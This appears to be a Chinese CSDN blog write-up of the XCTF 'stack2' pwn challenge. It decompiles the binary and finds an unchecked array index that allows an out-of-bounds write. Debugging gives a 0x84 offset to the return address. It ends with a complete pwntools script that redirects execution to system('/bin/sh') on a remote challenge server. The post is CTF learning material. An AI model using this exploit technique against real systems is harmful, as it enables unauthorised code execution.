攻防世界pwn题--stack2

最新推荐文章于 2024-07-19 22:11:45 发布
最新推荐文章于 2024-07-19 22:11:45 发布
阅读量539 收藏
点赞数
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ckk1314520/article/details/121070383
版权
本文详细分析了一个存在栈溢出漏洞的程序,指出由于缺少对变量v5的边界检查,导致可以修改任意内存地址。通过选择程序的特定选项,可以控制返回地址,从而执行任意代码。博主通过调试确定了数组v13的地址,并编写了exploit脚本来利用此漏洞,最终获取shell。文章揭示了栈溢出攻击的隐蔽性和危害,并展示了利用过程。
摘要由CSDN通过智能技术生成

查看保护机制 (有栈不可执行NX,有canary保护)

在这里插入图片描述

用IDA分析(查看伪代码)

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // eax
  unsigned int v5; // [esp+18h] [ebp-90h]
  unsigned int v6; // [esp+1Ch] [ebp-8Ch]
  int v7; // [esp+20h] [ebp-88h]
  unsigned int j; // [esp+24h] [ebp-84h]
  int v9; // [esp+28h] [ebp-80h]
  unsigned int i; // [esp+2Ch] [ebp-7Ch]
  unsigned int k; // [esp+30h] [ebp-78h]
  unsigned int l; // [esp+34h] [ebp-74h]
  char v13[100]; // [esp+38h] [ebp-70h]
  unsigned int v14; // [esp+9Ch] [ebp-Ch]

  v14 = __readgsdword(0x14u);                   // canary
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  v9 = 0;
  puts("***********************************************************");
  puts("*                      An easy calc                       *");
  puts("*Give me your numbers and I will return to you an average *");
  puts("*(0 <= x < 256)                                           *");
  puts("***********************************************************");
  puts("How many numbers you have:");
  __isoc99_scanf("%d", &v5);
  puts("Give me your numbers");
  for ( i = 0; i < v5 && (signed int)i <= 99; ++i )
  {
    __isoc99_scanf("%d", &v7);
    v13[i] = v7;
  }
  for ( j = v5; ; printf("average is %.2lf\n", (double)((long double)v9 / (double)j)) )
  {
    while ( 1 )
    {
      while ( 1 )
      {
        while ( 1 )
        {
          puts("1. show numbers\n2. add number\n3. change number\n4. get average\n5. exit");
          __isoc99_scanf("%d", &v6);
          if ( v6 != 2 )
            break;
          puts("Give me your number");
          __isoc99_scanf("%d", &v7);
          if ( j <= 0x63 )
          {
            v3 = j++;
            v13[v3] = v7;
          }
        }
        if ( v6 > 2 )
          break;
        if ( v6 != 1 )
          return 0;
        puts("id\t\tnumber");
        for ( k = 0; k < j; ++k )
          printf("%d\t\t%d\n", k, v13[k]);
      }
      if ( v6 != 3 )
        break;
      puts("which number to change:");
      __isoc99_scanf("%d", &v5);
      puts("new number:");
      __isoc99_scanf("%d", &v7);
      v13[v5] = v7;
    }
    if ( v6 != 4 )
      break;
    v9 = 0;
    for ( l = 0; l < j; ++l )
      v9 += v13[l];
  }
  return 0;
}

太菜了,看了老半天没看出来,漏洞在哪,网上找了找大佬博客,本题的栈溢出并不是常规的read这种输入输出流,而是因为对v5没有任何检测,数组没有边界检查导致的,这样的栈溢出比较隐蔽。在第三个选项,change number里v13定义为char v13[100],但是在这里并没有边界的检查导致栈溢出。
在这里插入图片描述
在这里插入图片描述

而且发现存在后门函数(地址为:0x0804859B)

在这里插入图片描述

因为程序在一开始会给数组赋初值,并且这个过程是我们可以参与的。 考虑到一般的数组赋值会从首位开始,我们可以猜想,如果我们知道我们写入程序的第一个数据的存储位置是否我们就知道了数组的首地址?
那么首先,我们来求这个地址
程序一开始会给数组赋值,我们来看一下这一块的伪代码和汇编

原理很清楚,只要选changenumber就可以修改任意地址的数据,我们只要找到v13数据距离ret的距离,就可以获取shell。

经过下面的调试,可以发现ebp=v13+0x70,ret=v13+0x84。由于程序中虽然有函数hackhere可以让我们获取到system的plt,但是他的参数不是/bin/sh,所以需要自己填返回地址和参数。

首先要知道v13数组的一个参数存放的位置:

在这里插入图片描述在这里插入图片描述
从汇编中可以看到程序通过scanf将数据存储到栈中,然后通过eax和ecx将数据存储到eax中存放的地址中去(cl是ecx的低位)
那意味着在程序运行到0x080486D5的位置时,此时eax中存放的即时数组的首地址 linux下我们用gdb调试的看一下
我们在0x080486D5的位置下个断点,输入点全部输入1(如下)

在这里插入图片描述

查看此时的各寄存器

在这里插入图片描述

看出eax中存放的地址,可以看到是0xffffd148

接下来查看当程序运行结束后esp指向的地址即为返回地址:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yxcgpzvH-1635687097164)(C:\Users\lenovo\AppData\Roaming\Typora\typora-user-images\image-20211031210057888.png)]
在0x080488f2出下断点,查看寄存器esp中的值:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QpJ7aFNY-1635687097165)(C:\Users\lenovo\AppData\Roaming\Typora\typora-user-images\image-20211031212453873.png)]
可以看到esp中的地址为0xffffd1cc, 所以得到距离为:0xffffd1cc-0xffffd148 = 0x84

现在能控制返回地址(system.plt:0x08048450)及其后面(+0x4)的参数(/bin/sh:0x08048987),只要主程序返回即可进入我们挟持的程序执行流。

编写exp.py

from pwn import *
def send_num(addr,num):
     io.sendlineafter("5. exit","3")
     io.sendlineafter("which number to change:",str(addr))
     io.sendlineafter("new number:",str(num))
io=remote("111.200.241.244",58388)
io.sendlineafter("you have:","1")
io.sendlineafter("your numbers","1")
send_num(0x84,0x50)
send_num(0x85,0x84)
send_num(0x86,0x04)
send_num(0x87,0x08)
send_num(0x8c,0x87)
send_num(0x8d,0x89)
send_num(0x8e,0x04)
send_num(0x8f,0x08)
io.sendline("5")
io.interactive()
CKL0g1c
关注
攻防世界(pwn篇)---CGfsb
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-09 1777
攻防世界(pwn篇)—CGfsb 文章目录攻防世界(pwn篇)---CGfsb目描述基本情况分析运行分析IDA 分析格式化字符串漏洞分析出payload找一下 s 的偏移量再看一看 pwnme 的地址exp 目描述 菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 基本情况分析 checksec命令可以查看可执行文件开启的保护 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.S
攻防世界(pwn篇)---level0
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-13 1596
攻防世界(pwn篇)—level0 文章目录攻防世界(pwn篇)---level0目描述基本情况分析运行分析IDA 分析分析出payloadexp 目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.Stack: Canary found 表示不能直接用溢
攻防世界PWN进阶区(stack2)
BurYiA的博客
01-26 942
stack2 哈,我又回来了 这个呢,基本rop,但有几个点比较难弄… 比如:偏移不好求,环境中没有/bin/bash等… 言归正传,我们先看一下基本信息 32位程序,有NX,有Canary。 运行可以发现它可以创建一个存储数字的数组,创建好以后我们可以对其中的数据进行一些基本的操作,ok,接下来开始硬刚IDA 通过观察main函数伪代码我们可以发现上图这个位置有点小问 这个时对数据进行...
攻防世界pwn——stack2
qq_62076255的博客
12-18 633
攻防世界pwn——stack2做记录
攻防世界新手模式lucknum
最新发布
2302_79735426的博客
07-19 180
1.__isoc99_scanf()这个函数为一个输入函数。故先找到__isoc99_scanf()这个函数。发现并没有进行特殊处理,只是返回用户输入的值。2.当用户输入7时直接输出flag。所以只要用户输入7就能得到flag。下载附件后放入64位的ida分析。
攻防世界 stack2
10-07 510
1.目 2.IDA分析 3.分析 本地存在明显的数组越界漏洞,选择3修改数据时,没有检查是否越界,直接操作指针进行修改。所以我们只要利用这个漏洞构造system的调用即可(注意,function区的hackhere方法不可用,调用会提示不存在bash。。。) 所以这道目最难在于addr_buf与addr_ret之间的距离。一开始看ida的栈信息,以为是74h,结果溢出失败。 这种情况很明显是编译器做了什么处理,所以只能动态调试。 在show data方法里面下断点,位置:0x80
pwn 攻防世界 stack2
A13837377363的博客
04-04 482
当时我检查了脚本很久,确认无误,gdb调试也确实修改了返回地址,但检查汇编代码发现,最后有 lea 指令改变了esp的值。查看源码,发现对修改数组没有做限制,很自然想到一个字节一个字节修改返回地址。要修改system的参数,幸好目不算太坏,可以找到'sh\x00'字符串。2.做不出目的时候,可以多看看汇编指令,可能有发现。在这道耗了很多时间,有很多陷阱,记录一下。这是esp最后的地址,相差了0x10。即使你修改了,也会像这样打不通。这是一开始记录的ebp的地址。所以修改脚本,并且打通本地。
攻防世界高手进阶区——stack2
weixin_62675330的博客
02-24 989
攻防世界高手进阶区——stack2 看目啥都没有 一,分析文件 checksec 发现居然存在栈溢出保护,这是以前做没看到过的,可能会有新的知识点。 运行文件 貌似是一个输入数字计算平均值的程序。 ida打开 unsigned int m; // [esp+34h] [ebp-74h] char v13[100]; // [esp+38h] [ebp-70h] unsigned int v14; // [esp+9Ch] [ebp-Ch] v14 = __readgs
攻防世界-pwn pwn-100(ROP)
菜的只能随便写写博客
11-05 2991
是LCTF 2016年的pwn100 参考文章:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&ctid=157 0x01 文件分析 64位elf 无stack 无PIE   0x02 运行分析  看起来像一个无限循环,不断接收输入。   0x03 静态分析 main: sub_40068E: ...
攻防世界babystack(pwn1)——glibc_all_in_one初体验
weixin_48066554的博客
05-14 1609
攻防世界babystack(pwn1)——glibc_all_in_one初体验 文章目录攻防世界babystack(pwn1)——glibc_all_in_one初体验引入初步分析1、checksec2、伪代码分析3、栈分析解思路1、泄露canary3、get shellexp本地libc运行尝试尝试1尝试2尝试3尝试4(重大进展) 引入 ​ 好久没做pwn了,找了道简单的ret2libc做做,顺便尝试解决一些历史遗留问 (其实就是让pwn使用本地的libc的问,省流:有突破性进展但没有完全解决
攻防世界 PWN 高手进阶 stack2 (write up)
qq_44768749的博客
08-18 541
攻防世界 PWN 高手进阶 stack2 (write up)stack20x01 查看保护机制0x02 查看反汇编0x03 利用过程修改返回地为system地址设置system函数的参数为'sh'exp stack2 该利用未对数组边界进行检查,从而可以实现栈溢出 0x01 查看保护机制 32位 开启NX和canary 无PIE 0x02 查看反汇编 int __cdecl main(int argc, const char **argv, const char **envp) { int
Stack2 攻防世界目分析
shanwei274的博客
04-18 1050
—XCTF 4th-QCTF-2018 前言,怎么说呢,这目还是把我折磨的可以的,我一开始是没有看到后面的直接狙击的,只能说呢。 我的不经意间的粗心,破坏了你许多的温柔 1.气的我直接检查保护: 32位程序,开启了canary保护。 2.ida查看: 首先放的第一幅图片呢,是我一开始以为可以溢出的,也可以看见我旁边标注了一个maybeoverflow。 但是是不可以的,因为首先由于这里的 i 最大上限100,可能有的人头铁就要说了,这里v7可以慢慢溢出去修改i,(和我一样) 可是这里v13的存储位
攻防世界 pwn——pwnstack
CNS-Enterprise BCC-1701-J
06-01 1199
攻防世界练习
攻防世界-stack2-Writeup
SkYe's Blog
05-13 544
stack2 目来源: XCTF 4th-QCTF-2018 [collapse title=“展开查看详情” status=“false”] 考点:数字下标溢出 保护情况: Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) 漏洞函数: puts("which numb
pwnstack-攻防世界
32bin的博客
04-01 591
【代码】pwnstack-攻防世界
攻防世界stack2逻辑漏洞
csdn546229768的博客
11-16 3683
到了进阶目越来越好玩了,发现解出来一道有解数学那味了 嗯,拿到目一看逻辑,做刚打完比赛(第一次)被逆向和pwn的逻辑给整怕了,这次遇到这种目,我选择硬刚! 首先读懂目的内在逻辑,并关注常见的pwn漏洞,首先一步步分析 这里有个循环100次接收输入,全局的看了下都是在对buf操作,先标志一手,但是这里无法产生溢出,那么看下面 首先看到for里面初始化j = v5 ,那么这个j也就是我们可控的标记一下,然后就是死循环,每次循环后调用一次printf select1就是显示所有值、select
攻防世界pwn-stack2学习记录
Hotspurs的博客
11-18 1369
pwn新手一枚,做这时苦苦没找出来解上说的0x84偏移,经过多次尝试,终于找到了正确的方式,遂以记录。 首先分析漏洞点: 当选择3.change number时,程序没有对输入的v5进行检测,遂可以产生溢出 之后看到程序给了getflag 开启动态调试,此时在v13[v5] = v7;处下断点。 如图所示输入 转到汇编指令,查看这个地址(edx存的就是输入9,看看他把9...
攻防世界 pwnstack writeup
m0_73605862的博客
05-30 950
Step5:shift+F12查看字符串发现/bin/sh,进入发现后门函数,查看地址(ctr+x)发现为:0x400762。Step6:编写exp,输入后,ls查看文件,然后发现有一个叫flag的文件,cat查看文件,得到flag。【来源】(攻防世界)https://adworld.xctf.org.cn/challenges/list。Step4:进入vuln()函数查看一下,发现有一个buf,查看发现从0xA0到0x08。Step3:发现main函数,f5查看伪代码(如果键被占用,fn+f5)。
攻防世界pwn高手区stack2 lea调整栈帧导致偏移错误
Gtooler的博客
10-14 1762
Stack2 这废话很多,说白了就一个数组越界的漏洞可以利用,没有对下标v5做限定,所以可以利用数组越界,直接越过canary,利用留下的后门getshell 刚开始看ida以为位移是0x74所以exp如下 from pwn import * p = remote('111.200.241.244', '50928') # p = process("./stack2") # context.log_level = 'debug' hackhere = [0x9b, 0x85, 0x04, 0x08
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界PWN-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值